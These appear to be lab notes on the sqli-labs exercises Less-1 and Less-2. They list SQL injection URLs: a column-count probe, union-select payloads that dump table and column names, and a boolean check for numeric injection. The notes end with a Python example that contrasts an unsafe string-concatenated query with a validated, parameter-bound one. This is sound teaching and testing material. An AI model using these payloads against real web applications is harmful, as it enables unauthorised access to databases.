http://192.168.31.207/sqli/Less-1?id=1' order by 4--+ # 4 raises an error, so there are 3 columns
http://192.168.31.207/sqli/Less-1?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables --+ # list all tables
http://192.168.31.207/sqli/Less-1?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name = "SCHEMATA"--+ # list all column names in the SCHEMATA table
Less-2
Level 2 also raises an error on a single quote.
http://192.168.31.207/sqli/Less-2?id=1 and 1=1--+ # normal
http://192.168.31.207/sqli/Less-2?id=1 and 1=12--+ # abnormal, so this is numeric injection
http://192.168.31.207/sqli/Less-2?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables--+ # list all table names
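The `and 1=1` / `and 1=12` check from Less-2, replayed against an in-memory SQLite table as an added example (not code from these notes or from sqli-labs), next to a lookup that validates and binds `id`. The table, its rows and the function names are assumptions; `--+` is written as `-- ` because `+` URL-decodes to a space.

```python
import sqlite3

def make_db():
    # Constructed sample table standing in for the lab's 3-column table (assumption).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "pw1"), (2, "bob", "pw2")])
    return db

def lookup_unsafe(db, raw_id):
    # Less-2 pattern (assumed): the parameter is pasted into the SQL unquoted,
    # so everything after the number is parsed as SQL.
    sql = "SELECT id, username, password FROM users WHERE id=" + raw_id + " LIMIT 1"
    return db.execute(sql).fetchall()

def lookup_safe(db, raw_id):
    # Accept only a short run of ASCII digits, then pass it as a bound parameter.
    if not (raw_id.isascii() and raw_id.isdigit()) or len(raw_id) > 18:
        return []
    sql = "SELECT id, username, password FROM users WHERE id = ? LIMIT 1"
    return db.execute(sql, (int(raw_id),)).fetchall()

def probe_differs(lookup, db):
    # The notes' numeric-injection signal: a true and a false condition
    # appended to id produce different results.
    return lookup(db, "1 and 1=1-- ") != lookup(db, "1 and 1=12-- ")

if __name__ == "__main__":
    db = make_db()
    print("unsafe lookup reacts to the condition:", probe_differs(lookup_unsafe, db))
    print("safe lookup reacts to the condition:  ", probe_differs(lookup_safe, db))
    print("safe lookup, id=1:", lookup_safe(db, "1"))
```

`probe_differs` can be kept as a regression check: it should stay false for every handler that takes a numeric `id`.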